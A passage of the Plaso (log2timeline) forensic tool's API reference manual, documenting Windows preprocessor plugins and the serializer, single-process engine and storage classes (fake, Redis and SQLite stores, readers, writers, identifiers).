This file contains preprocessors for Windows. class plaso.preprocessors.windows.WindowsAllUsersAppDataKnowledgeBasePlugin Bases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin The allusersdata knowledge base value plugin. The allusersdata value is needed for the expansion of %%environ_allusersappdata%% in artifact definitions. Collect(mediator) Collects values from the knowledge base. Parameters mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base. Raises PreProcessFail – if the preprocessing fails. class plaso.preprocessors.windows.WindowsAllUsersAppProfileKnowledgeBasePlugin Bases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin The allusersprofile knowledge base value plugin. The allusersprofile value is needed for the expansion of %%environ_allusersappprofile%% in artifact definitions. It is derived from %ProgramData% for versions of Windows, Vista and later, that do not define %AllUsersPro- file%. Collect(mediator) Collects values from the knowledge base.

5.1. Subpackages 475 Plaso (log2timeline), Release 20210606

Parameters mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base. Raises PreProcessFail – if the preprocessing fails. class plaso.preprocessors.windows.WindowsAllUsersProfileEnvironmentVariablePlugin Bases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin The Windows %AllUsersProfile% environment variable plugin. ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableAllUsersProfile' class plaso.preprocessors.windows.WindowsAvailableTimeZonesPlugin Bases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin, plaso.lib.dtfabric_helper.DtFabricHelper The Windows available time zones plugin. ARTIFACT_DEFINITION_NAME = 'WindowsAvailableTimeZones' class plaso.preprocessors.windows.WindowsCodepagePlugin Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin The Windows codepage plugin. ARTIFACT_DEFINITION_NAME = 'WindowsCodePage' class plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin Windows environment variable artifact preprocessor plugin interface. class plaso.preprocessors.windows.WindowsEventLogProvidersPlugin Bases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin The Windows Event Log providers plugin. ARTIFACT_DEFINITION_NAME = 'WindowsEventLogProviders' class plaso.preprocessors.windows.WindowsHostnamePlugin Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin The Windows hostname plugin. ARTIFACT_DEFINITION_NAME = 'WindowsComputerName' class plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPlugin Bases: plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin Windows path environment variable plugin interface. class plaso.preprocessors.windows.WindowsProgramDataEnvironmentVariablePlugin Bases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin The Windows %ProgramData% environment variable plugin. ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramData' class plaso.preprocessors.windows.WindowsProgramDataKnowledgeBasePlugin Bases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin The programdata knowledge base value plugin. The programdata value is needed for the expansion of %%environ_programdata%% in artifact definitions.

476 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

It is derived from %AllUsersProfile% for versions of Windows prior to Vista that do not define %ProgramData%.

Collect(mediator) Collects values from the knowledge base. Parameters mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base. Raises PreProcessFail – if the preprocessing fails. class plaso.preprocessors.windows.WindowsProgramFilesEnvironmentVariablePlugin Bases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin The Windows %ProgramFiles% environment variable plugin. ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramFiles' class plaso.preprocessors.windows.WindowsProgramFilesX86EnvironmentVariablePlugin Bases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin The Windows %ProgramFilesX86% environment variable plugin. ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramFilesX86' class plaso.preprocessors.windows.WindowsSystemProductPlugin Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin The Windows system product information plugin. ARTIFACT_DEFINITION_NAME = 'WindowsProductName' class plaso.preprocessors.windows.WindowsSystemRootEnvironmentVariablePlugin Bases: plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPlugin The Windows %SystemRoot% environment variable plugin. ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableSystemRoot' class plaso.preprocessors.windows.WindowsSystemVersionPlugin Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin The Windows system version information plugin. ARTIFACT_DEFINITION_NAME = 'WindowsCurrentVersion' class plaso.preprocessors.windows.WindowsTimeZonePlugin Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin The Windows time zone plugin. ARTIFACT_DEFINITION_NAME = 'WindowsTimezone' class plaso.preprocessors.windows.WindowsUserAccountsPlugin Bases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin The Windows user account plugin. ARTIFACT_DEFINITION_NAME = 'WindowsRegistryProfiles' class plaso.preprocessors.windows.WindowsWinDirEnvironmentVariablePlugin Bases: plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPlugin The Windows %WinDir% environment variable plugin. ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableWinDir'

5.1. Subpackages 477 Plaso (log2timeline), Release 20210606

Module contents

Preprocessor.

5.1.13 plaso.serializer package

Submodules plaso.serializer.interface module

The serializer object interfaces. class plaso.serializer.interface.AttributeContainerSerializer Bases: object Class that implements the attribute container serializer interface. abstract ReadSerialized(serialized) Reads an attribute container from serialized form. Parameters serialized (object) – serialized form. Returns attribute container. Return type AttributeContainer abstract WriteSerialized(attribute_container) Writes an attribute container to serialized form. Parameters attribute_container (AttributeContainer) – attribute container. Returns serialized form. Return type object plaso.serializer.json_serializer module

The JSON serializer object implementation. class plaso.serializer.json_serializer.JSONAttributeContainerSerializer Bases: plaso.serializer.interface.AttributeContainerSerializer JSON attribute container serializer. classmethod ReadSerialized(json_string) Reads an attribute container from serialized form. Parameters json_string (str) – JSON serialized attribute container. Returns attribute container or None. Return type AttributeContainer classmethod ReadSerializedDict(json_dict) Reads an attribute container from serialized dictionary form. Parameters json_dict (dict[str, object]) – JSON serialized objects. Returns attribute container or None. Return type AttributeContainer Raises TypeError – if the serialized dictionary does not contain an AttributeContainer.

478 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

classmethod WriteSerialized(attribute_container) Writes an attribute container to serialized form. Parameters attribute_container (AttributeContainer) – attribute container. Returns A JSON string containing the serialized form. Return type str classmethod WriteSerializedDict(attribute_container) Writes an attribute container to serialized form. Parameters attribute_container (AttributeContainer) – attribute container. Returns JSON serialized objects. Return type dict[str, object] plaso.serializer.logger module

The serializer sub module logger.

Module contents

5.1.14 plaso.single_process package

Submodules plaso.single_process.extraction_engine module

The single process processing engine. class plaso.single_process.extraction_engine.SingleProcessEngine Bases: plaso.engine.engine.BaseEngine Class that defines the single process engine. ProcessSources(session, source_path_specs, storage_writer, resolver_context, processing_configuration, force_parser=False, status_update_callback=None) Processes the sources. Parameters • session (Session) – session in which the sources are processed. • source_path_specs (list[dfvfs.PathSpec]) – path specifications of the sources to process. • storage_writer (StorageWriter) – storage writer for a session storage. • resolver_context (dfvfs.Context) – resolver context. • processing_configuration (ProcessingConfiguration) – processing configuration. • force_parser (Optional[bool]) – True if a specified parser should be forced tobe used to extract events. • status_update_callback (Optional[function]) – callback function for status updates. Returns processing status.

5.1. Subpackages 479 Plaso (log2timeline), Release 20210606

Return type ProcessingStatus

Module contents

5.1.15 plaso.storage package

Subpackages

plaso.storage.fake package

Submodules

plaso.storage.fake.event_heap module

Heap to sort events in chronological order. class plaso.storage.fake.event_heap.EventHeap Bases: object Event heap. PopEvent() Pops an event from the heap. Returns event. Return type EventObject PopEvents() Pops events from the heap. Yields EventObject – event. PushEvent(event, event_index) Pushes an event onto the heap. Parameters • event (EventObject) – event. • event_index (int) – index of the event in the storage. property number_of_events number of serialized events on the heap. Type int plaso.storage.fake.fake_store module

Fake (in-memory only) store for testing. class plaso.storage.fake.fake_store.FakeStore(storage_type='session') Bases: plaso.storage.interface.BaseStore Fake (in-memory only) store for testing. Close() Closes the store.

480 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Raises • IOError – if the store is already closed. • OSError – if the store is already closed. GetAttributeContainerByIdentifier(container_type, identifier) Retrieves a specific type of container with a specific identifier. Parameters • container_type (str) – container type. • identifier (AttributeContainerIdentifier) – attribute container identifier. Returns attribute container or None if not available. Return type AttributeContainer GetAttributeContainerByIndex(container_type, index) Retrieves a specific attribute container. Parameters • container_type (str) – attribute container type. • index (int) – attribute container index. Returns attribute container or None if not available. Return type AttributeContainer Raises • IOError – if the attribute container type is not supported. • OSError – if the attribute container type is not supported. GetAttributeContainers(container_type) Retrieves a specific type of attribute containers. Parameters container_type (str) – attribute container type. Returns attribute container generator. Return type generator(AttributeContainers) GetEventTagByEventIdentifier(event_identifier) Retrieves the event tag related to a specific event identifier. Parameters event_identifier (AttributeContainerIdentifier) – event. Returns event tag or None if not available. Return type EventTag Raises • IOError – if an unsupported event identifier is provided or if the event tag does not exist. • OSError – if an unsupported event identifier is provided or if the event tag does not exist. GetNumberOfAttributeContainers(container_type) Retrieves the number of a specific type of attribute containers. Parameters container_type (str) – attribute container type. Returns the number of containers of a specified type. Return type int

5.1. Subpackages 481 Plaso (log2timeline), Release 20210606

GetSortedEvents(time_range=None) Retrieves the events in increasing chronological order. Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period. Returns event generator. Return type generator(EventObject) Raises • IOError – when the storage writer is closed. • OSError – when the storage writer is closed. HasAttributeContainers(container_type) Determines if a store contains a specific type of attribute container. Parameters container_type (str) – attribute container type. Returns True if the store contains the specified type of attribute containers. Return type bool Open(**kwargs) Opens the store. Raises • IOError – if the store is already opened. • OSError – if the store is already opened. plaso.storage.fake.writer module

Fake (in-memory only) storage writer for testing. class plaso.storage.fake.writer.FakeStorageWriter(storage_type='session') Bases: plaso.storage.writer.StorageWriter Fake (in-memory only) storage writer object. task_completion task completion attribute container. Type TaskCompletion task_start task start attribute container. Type TaskStart GetFirstWrittenEventSource() Retrieves the first event source that was written after open. Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition. Returns event source or None if there are no newly written ones. Return type EventSource Raises

482 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• IOError – when the storage writer is closed. • OSError – when the storage writer is closed. GetNextWrittenEventSource() Retrieves the next event source that was written after open. Returns event source or None if there are no newly written ones. Return type EventSource Raises • IOError – when the storage writer is closed. • OSError – when the storage writer is closed. Open(**unused_kwargs) Opens the storage writer. Raises • IOError – if the storage writer is already opened. • OSError – if the storage writer is already opened. WriteTaskCompletion(task) Writes task completion information. Parameters task (Task) – task. Raises • IOError – if the storage type does not support writing a task completion or when the storage writer is closed. • OSError – if the storage type does not support writing a task completion or when the storage writer is closed. WriteTaskStart(task) Writes task start information. Parameters task (Task) – task. Raises • IOError – if the storage type does not support writing a task start or when the storage writer is closed. • OSError – if the storage type does not support writing a task start or when the storage writer is closed.

Module contents plaso.storage.redis package

Submodules plaso.storage.redis.reader module

Redis storage reader.

5.1. Subpackages 483 Plaso (log2timeline), Release 20210606 class plaso.storage.redis.reader.RedisStorageReader(session_identifier, task_identifier, redis_client=None) Bases: plaso.storage.reader.StorageReader Redis storage file reader. plaso.storage.redis.redis_store module

Redis store. Only supports task storage at the moment. class plaso.storage.redis.redis_store.RedisStore(storage_type='session') Bases: plaso.storage.interface.BaseStore Redis store. Attribute containers are stored as Redis Hashes. All keys are prefixed with the session identifier to avoid colli- sions. Event identifiers are also stored in an index to enable sorting. Close() Closes the store. Raises • IOError – if the store is already closed. • OSError – if the store is already closed. DEFAULT_REDIS_URL = 'redis://127.0.0.1/0' GetAttributeContainerByIdentifier(container_type, identifier) Retrieves a specific type of container with a specific identifier. Parameters • container_type (str) – container type. • identifier (RedisKeyIdentifier) – attribute container identifier. Returns attribute container or None if not available. Return type AttributeContainer Raises • IOError – when the store is closed or if an unsupported identifier is provided. • OSError – when the store is closed or if an unsupported identifier is provided. GetAttributeContainerByIndex(container_type, index) Retrieves a specific attribute container. Parameters • container_type (str) – attribute container type. • index (int) – attribute container index. Returns attribute container or None if not available. Return type AttributeContainer Raises • IOError – if the attribute container type is not supported.

484 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• OSError – if the attribute container type is not supported. GetAttributeContainers(container_type) Retrieves attribute containers Parameters container_type (str) – container type attribute of the container being added. Yields AttributeContainer – attribute container. GetEventTagByEventIdentifier(event_identifier) Retrieves the event tag related to a specific event identifier. Parameters event_identifier (AttributeContainerIdentifier) – event. Returns event tag or None if not available. Return type EventTag GetNumberOfAttributeContainers(container_type) Retrieves the number of a specific type of attribute containers. Parameters container_type (str) – attribute container type. Returns the number of containers of a specified type. Return type int GetSerializedAttributeContainers(container_type, cursor, maximum_number_of_items) Fetches serialized attribute containers. Parameters • container_type (str) – attribute container type. • cursor (int) – Redis cursor. • maximum_number_of_items (int) – maximum number of containers to retrieve, where 0 represent no limit. Returns containing: int: Redis cursor. list[bytes]: serialized attribute containers. Return type tuple GetSortedEvents(time_range=None) Retrieves the events in increasing chronological order. Parameters time_range (Optional[TimeRange]) – This argument is not supported by the Redis store. Yields EventObject – event. Raises RuntimeError – if a time_range argument is specified. HasAttributeContainers(container_type) Determines if the store contains a specific type of attribute container. Parameters container_type (str) – attribute container type. Returns True if the store contains the specified type of attribute containers. Return type bool classmethod MarkTaskAsMerging(task_identifier, session_identifier, redis_client=None, url=None) Marks a finalized task as pending merge.

5.1. Subpackages 485 Plaso (log2timeline), Release 20210606

Parameters • task_identifier (str) – identifier of the task. • session_identifier (str) – session identifier, formatted as a UUID. • redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created. • url (Optional[str]) – URL for a Redis database. If not specified, RE- DIS_DEFAULT_URL will be used. Raises • IOError – if the task being updated is not finalized. • OSError – if the task being updated is not finalized. Open(redis_client=None, session_identifier=None, task_identifier=None, url=None, **unused_kwargs) Opens the store. Parameters • redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created. If no client is specified a new client will be opened connected to theRedis instance specified by ‘url’. • session_identifier (Optional[str]) – session identifier, formatted as a UUID. • task_identifier (Optional[str]) – unique identifier of the task the store will store containers for. If not specified, an identifier will be generated. • url (Optional[str]) – URL for a Redis database. If not specified, the DE- FAULT_REDIS_URL will be used. Raises • IOError – if the store is already connected to a Redis instance. • OSError – if the store is already connected to a Redis instance. Remove() Removes the contents of the store from Redis. RemoveAttributeContainer(container_type, identifier) Removes an attribute container from the store. Parameters • container_type (str) – container type attribute of the container being removed. • identifier (AttributeContainerIdentifier) – event data identifier. RemoveAttributeContainers(container_type, container_identifiers) Removes multiple attribute containers from the store. Parameters • container_type (str) – container type attribute of the container being removed. • container_identifiers (list[AttributeContainerIdentifier]) – event data identifier. classmethod ScanForProcessedTasks(session_identifier, redis_client=None, url=None) Scans a Redis database for processed tasks. Parameters

486 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• session_identifier (str) – session identifier, formatted as a UUID. • redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created. • url (Optional[str]) – URL for a Redis database. If not specified, RE- DIS_DEFAULT_URL will be used. Returns containing list[str]: identifiers of processed tasks, which may be empty ifthe connection to Re- dis times out. Redis: Redis client used for the query. Return type tuple plaso.storage.redis.writer module

Storage writer for Redis. class plaso.storage.redis.writer.RedisStorageWriter(storage_type='session') Bases: plaso.storage.writer.StorageWriter Redis-based storage writer. GetFirstWrittenEventSource() Retrieves the first event source that was written after open. Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition. Returns None as there are no newly written event sources. Return type EventSource Raises • IOError – if the storage writer is closed. • OSError – if the storage writer is closed. GetNextWrittenEventSource() Retrieves the next event source that was written after open. Returns None as there are no newly written event sources. Return type EventSource Raises • IOError – if the storage writer is closed. • OSError – if the storage writer is closed. Open(redis_client=None, session_identifier=None, task_identifier=None, **unused_kwargs) Opens the storage writer. Parameters • redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created. If no client is specified a new client will be opened connected to theRedis instance specified by ‘url’.

5.1. Subpackages 487 Plaso (log2timeline), Release 20210606

• session_identifier (Optional[str]) – session identifier. • task_identifier (Optional[str]) – task identifier. Raises • IOError – if the storage writer is already opened. • OSError – if the storage writer is already opened. WritePreprocessingInformation(knowledge_base) Writes preprocessing information. Parameters knowledge_base (KnowledgeBase) – contains the preprocessing information. Raises • IOError – always as the Redis store does not support preprocessing information. • OSError – always as the Redis store does not support preprocessing information. WriteSessionCompletion(session) Writes session completion information. Parameters session (Session) – session the storage changes are part of. Raises • IOError – always, as the Redis store does not support writing a session completion. • OSError – always, as the Redis store does not support writing a session completion. WriteSessionConfiguration(session) Writes session configuration information. Parameters session (Session) – session the storage changes are part of. Raises • IOError – always, as the Redis store does not support writing a session configuration. • OSError – always, as the Redis store does not support writing a session configuration. WriteSessionStart(session) Writes session start information. Parameters session (Session) – session the storage changes are part of. Raises • IOError – always, as the Redis store does not support writing a session start. • OSError – always, as the Redis store does not support writing a session start.

Module contents plaso.storage.sqlite package

Submodules plaso.storage.sqlite.reader module

SQLite-based storage file reader.

488 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 class plaso.storage.sqlite.reader.SQLiteStorageFileReader(path) Bases: plaso.storage.reader.StorageReader SQLite-based storage file reader. plaso.storage.sqlite.sqlite_file module

SQLite-based storage file. class plaso.storage.sqlite.sqlite_file.SQLiteStorageFile(storage_type='session') Bases: plaso.storage.interface.BaseStore SQLite-based storage file. compression_format compression format. Type str format_version storage format version. Type int serialization_format serialization format. Type str storage_type storage type. Type str classmethod CheckSupportedFormat(path, check_readable_only=False) Checks if the storage file format is supported. Parameters • path (str) – path to the storage file. • check_readable_only (Optional[bool]) – whether the store should only be checked to see if it can be read. If False, the store will be checked to see if it can be read and written to. Returns True if the format is supported. Return type bool Close() Closes the file. Raises • IOError – if the storage file is already closed. • OSError – if the storage file is already closed. GetAttributeContainerByIdentifier(container_type, identifier) Retrieves a specific type of container with a specific identifier. Parameters • container_type (str) – container type.

5.1. Subpackages 489 Plaso (log2timeline), Release 20210606

• identifier (SQLTableIdentifier) – attribute container identifier. Returns attribute container or None if not available. Return type AttributeContainer Raises • IOError – when the store is closed or if an unsupported identifier is provided. • OSError – when the store is closed or if an unsupported identifier is provided. GetAttributeContainerByIndex(container_type, index) Retrieves a specific attribute container. Parameters • container_type (str) – attribute container type. • index (int) – attribute container index. Returns attribute container or None if not available. Return type AttributeContainer Raises • IOError – when the store is closed or when there is an error querying the storage file. • OSError – when the store is closed or when there is an error querying the storage file. GetAttributeContainers(container_type) Retrieves a specific type of stored attribute containers. Parameters container_type (str) – attribute container type. Returns attribute container generator. Return type generator(AttributeContainer) Raises • IOError – when there is an error querying the storage file. • OSError – when there is an error querying the storage file. GetEventTagByEventIdentifier(event_identifier) Retrieves the event tag related to a specific event identifier. Parameters event_identifier (SQLTableIdentifier) – event. Returns event tag or None if not available. Return type EventTag Raises • IOError – when the store is closed or when there is an error querying the storage file. • OSError – when the store is closed or when there is an error querying the storage file. GetNumberOfAttributeContainers(container_type) Retrieves the number of a specific type of attribute containers. Parameters container_type (str) – attribute container type. Returns the number of containers of a specified type. Return type int

490 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Raises • IOError – when there is an error querying the storage file. • OSError – when there is an error querying the storage file. • ValueError – if an unsupported container type is provided. GetSortedEvents(time_range=None) Retrieves the events in increasing chronological order. Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period. Returns event generator. Return type generator(EventObject) HasAttributeContainers(container_type) Determines if store contains a specific type of attribute containers. Parameters container_type (str) – attribute container type. Returns True if the store contains the specified type of attribute containers. Return type bool Open(path=None, read_only=True, **unused_kwargs) Opens the store. Parameters • path (Optional[str]) – path to the storage file. • read_only (Optional[bool]) – True if the file should be opened in read-only mode. Raises • IOError – if the storage file is already opened or if the database cannot be connected. • OSError – if the storage file is already opened or if the database cannot be connected. • ValueError – if path is missing. plaso.storage.sqlite.writer module

Storage writer for SQLite storage files. class plaso.storage.sqlite.writer.SQLiteStorageFileWriter(storage_type='session') Bases: plaso.storage.writer.StorageWriter SQLite-based storage file writer. GetFirstWrittenEventSource() Retrieves the first event source that was written after open. Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition. Returns event source or None if there are no newly written ones. Return type EventSource Raises

5.1. Subpackages 491 Plaso (log2timeline), Release 20210606

Module contents

Submodules plaso.storage.event_tag_index module

The event tag index. class plaso.storage.event_tag_index.EventTagIndex Bases: object Event tag index. The event tag index is used to map event tags to events. It is necessary for the ZIP storage files since previously stored event tags cannot be altered. GetEventTagByIdentifier(storage_reader, event_identifier) Retrieves the most recently updated event tag for an event. Parameters • storage_reader (StorageReader) – storage reader. • event_identifier (AttributeContainerIdentifier) – event attribute container identifier. Returns event tag or None if the event has no event tag. Return type EventTag SetEventTag(event_tag) Sets an event tag in the index. Parameters event_tag (EventTag) – event tag.

492 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.storage.factory module

This file contains the storage factory class. class plaso.storage.factory.StorageFactory Bases: object Storage factory. classmethod CheckStorageFileHasSupportedFormat(path, check_readable_only=False) Checks if the storage file format is supported. Parameters • path (str) – path to the storage file. • check_readable_only (Optional[bool]) – whether the store should only be checked to see if it can be read. If False, the store will be checked to see if it can be read and written to. Returns True if the format is supported. Return type bool classmethod CreateStorageFile(storage_format) Creates a storage file. Parameters storage_format (str) – storage format. Returns a storage file or None if the storage file cannotbe opened or the storage format is not supported. Return type StorageFile classmethod CreateStorageReaderForFile(path) Creates a storage reader based on the file. Parameters path (str) – path to the storage file. Returns a storage reader or None if the storage file cannot be opened or the storage format is not supported. Return type StorageReader classmethod CreateStorageWriter(storage_format) Creates a storage writer. Parameters storage_format (str) – storage format. Returns a storage writer or None if the storage file cannot be opened or the storage format is not supported. Return type StorageWriter classmethod CreateStorageWriterForFile(path) Creates a storage writer based on the file. Parameters path (str) – path to the storage file. Returns

5.1. Subpackages 493 Plaso (log2timeline), Release 20210606

a storage writer or None if the storage file cannot be opened or the storage format is not supported. Return type StorageWriter classmethod CreateTaskStorageReader(storage_format, task, path) Creates a task storage reader. Parameters • storage_format (str) – storage format. • task (Task) – task the storage changes are part of. • path (str) – path to the storage file. Returns a storage reader or None if the storage file cannot be opened or the storage format is not supported. Return type StorageReader classmethod CreateTaskStorageWriter(storage_format) Creates a task storage writer. Parameters storage_format (str) – storage format. Returns a storage writer or None if the storage file cannot be opened or the storage format is not supported. Return type StorageWriter

plaso.storage.identifiers module

Storage attribute container identifier objects. class plaso.storage.identifiers.FakeIdentifier(sequence_number) Bases: plaso.containers.interface.AttributeContainerIdentifier Fake attribute container identifier intended for testing. sequence_number sequence number of the attribute container. Type int CopyToString() Copies the identifier to a string representation. Returns unique identifier or None. Return type str class plaso.storage.identifiers.RedisKeyIdentifier(name, sequence_number) Bases: plaso.containers.interface.AttributeContainerIdentifier Redis key attribute container identifier. name name of the attribute container. Type str

494 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

sequence_number sequence number of the attribute container. Type int CopyToString() Copies the identifier to a string representation. Returns unique identifier or None. Return type str class plaso.storage.identifiers.SQLTableIdentifier(name, sequence_number) Bases: plaso.containers.interface.AttributeContainerIdentifier SQL table attribute container identifier. The identifier is used to uniquely identify attribute containers. Where for example an attribute container isstored as a JSON serialized data in a SQLite database file. name name of the table (attribute container). Type str sequence_number sequence number of the attribute container. Type int CopyToString() Copies the identifier to a string representation. Returns unique identifier or None. Return type str property row_identifier unique identifier of the row in the table. Type int plaso.storage.interface module

The attribute container store interface. class plaso.storage.interface.BaseStore(storage_type='session') Bases: object Attribute container store interface. format_version storage format version. Type int serialization_format serialization format. Type str storage_type storage type. Type str

5.1. Subpackages 495 Plaso (log2timeline), Release 20210606

AddAttributeContainer(container) Adds a new attribute container. Parameters container (AttributeContainer) – attribute container. Raises • OSError – if the store cannot be written to. • IOError – if the store cannot be written to. abstract Close() Closes the store. abstract GetAttributeContainerByIdentifier(container_type, identifier) Retrieves a specific type of container with a specific identifier. Parameters • container_type (str) – container type. • identifier (AttributeContainerIdentifier) – attribute container identifier. Returns attribute container or None if not available. Return type AttributeContainer Raises • IOError – when the store is closed or if an unsupported identifier is provided. • OSError – when the store is closed or if an unsupported identifier is provided. abstract GetAttributeContainers(container_type) Retrieves a specific type of attribute containers. Parameters container_type (str) – attribute container type. Returns attribute container generator. Return type generator(AttributeContainers) Raises • IOError – when the store is closed. • OSError – when the store is closed. abstract GetEventTagByEventIdentifier(event_identifier) Retrieves the event tag related to a specific event identifier. Parameters event_identifier (AttributeContainerIdentifier) – event. Returns event tag or None if not available. Return type EventTag Raises • IOError – when the store is closed. • OSError – when the store is closed. abstract GetNumberOfAttributeContainers(container_type) Retrieves the number of a specific type of attribute containers. Parameters container_type (str) – attribute container type. Returns the number of containers of a specified type.

496 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Return type int GetSessions() Retrieves the sessions. Yields Session – session attribute container. Raises • IOError – if there is a mismatch in session identifiers between the session start and completion attribute containers. • OSError – if there is a mismatch in session identifiers between the session start and completion attribute containers. abstract GetSortedEvents(time_range=None) Retrieves the events in increasing chronological order. This includes all events written to the store including those pending being flushed (written) to the store. Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period. Yields EventObject – event. abstract HasAttributeContainers(container_type) Determines if a store contains a specific type of attribute container. Parameters container_type (str) – attribute container type. Returns True if the store contains the specified type of attribute containers. Return type bool abstract Open(**kwargs) Opens the store. SetSerializersProfiler(serializers_profiler) Sets the serializers profiler. Parameters serializers_profiler (SerializersProfiler) – serializers profiler. SetStorageProfiler(storage_profiler) Sets the storage profiler. Parameters storage_profiler (StorageProfiler) – storage profiler. UpdateAttributeContainer(container) Updates an existing attribute container. Parameters container (AttributeContainer) – attribute container. Raises • OSError – if the store cannot be written to. • IOError – if the store cannot be written to. WriteTaskCompletion(task_completion) Writes task completion information. Parameters task_completion (TaskCompletion) – task completion information. Raises

5.1. Subpackages 497 Plaso (log2timeline), Release 20210606

• IOError – if the storage type does not support writing a task completion or if the store cannot be written to. • OSError – if the storage type does not support writing a task completion or if the store cannot be written to. WriteTaskStart(task_start) Writes task start information. Parameters task_start (TaskStart) – task start information. Raises • IOError – if the storage type does not support writing a task start or if the store cannot be written to. • OSError – if the storage type does not support writing a task start or if the store cannot be written to. plaso.storage.logger module

The storage sub module logger. plaso.storage.merge_reader module

The storage merge reader. class plaso.storage.merge_reader.StorageMergeReader(session, storage_writer, task_storage_reader) Bases: object Storage reader for merging. number_of_containers number of containers merged in last call to MergeAttributeContainers. Type int AddAttributeContainer(container) Adds an attribute container. Parameters container (AttributeContainer) – attribute container. Close() Closes the merge reader. MergeAttributeContainers(maximum_number_of_containers=0) Reads attribute containers from a task store into the writer. Parameters maximum_number_of_containers (Optional[int]) – maximum number of containers to merge, where 0 represent no limit. Returns True if the entire task storage file has been merged. Return type bool

498 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.storage.reader module

The storage reader. class plaso.storage.reader.StorageReader Bases: object Storage reader interface. Close() Closes the storage reader. GetAttributeContainerByIdentifier(container_type, identifier) Retrieves a specific type of container with a specific identifier. Parameters • container_type (str) – container type. • identifier (AttributeContainerIdentifier) – attribute container identifier. Returns attribute container or None if not available. Return type AttributeContainer GetAttributeContainers(container_type) Retrieves a specific type of attribute containers. Parameters container_type (str) – attribute container type. Returns attribute container generator. Return type generator(AttributeContainers) GetFormatVersion() Retrieves the format version of the underlying storage file. Returns the format version. Return type int GetNumberOfAttributeContainers(container_type) Retrieves the number of a specific type of attribute containers. Parameters container_type (str) – attribute container type. Returns the number of containers of a specified type. Return type int GetSerializationFormat() Retrieves the serialization format of the underlying storage file. Returns the serialization format. Return type str GetSessions() Retrieves the sessions. Returns session generator. Return type generator(Session) GetSortedEvents(time_range=None) Retrieves the events in increasing chronological order. This includes all events written to the storage including those pending being flushed (written) to the storage.

5.1. Subpackages 499 Plaso (log2timeline), Release 20210606

Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period. Returns event generator. Return type generator(EventObject) GetStorageType() Retrieves the storage type of the underlying storage file. Returns the storage type. Return type str HasAttributeContainers(container_type) Determines if a store contains a specific type of attribute container. Parameters container_type (str) – attribute container type. Returns True if the store contains the specified type of attribute containers. Return type bool SetSerializersProfiler(serializers_profiler) Sets the serializers profiler. Parameters serializers_profiler (SerializersProfiler) – serializers profiler. SetStorageProfiler(storage_profiler) Sets the storage profiler. Parameters storage_profiler (StorageProfiler) – storage profiler. __enter__() Make usable with “with” statement. __exit__(exception_type, value, traceback) Make usable with “with” statement. plaso.storage.time_range module

Storage time range objects. class plaso.storage.time_range.TimeRange(start_timestamp, end_timestamp) Bases: object Date and time range. The timestamp are integers containing the number of microseconds since January 1, 1970, 00:00:00 UTC. duration duration of the range in microseconds. Type int end_timestamp timestamp that marks the end of the range. Type int start_timestamp timestamp that marks the start of the range. Type int

500 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.storage.writer module

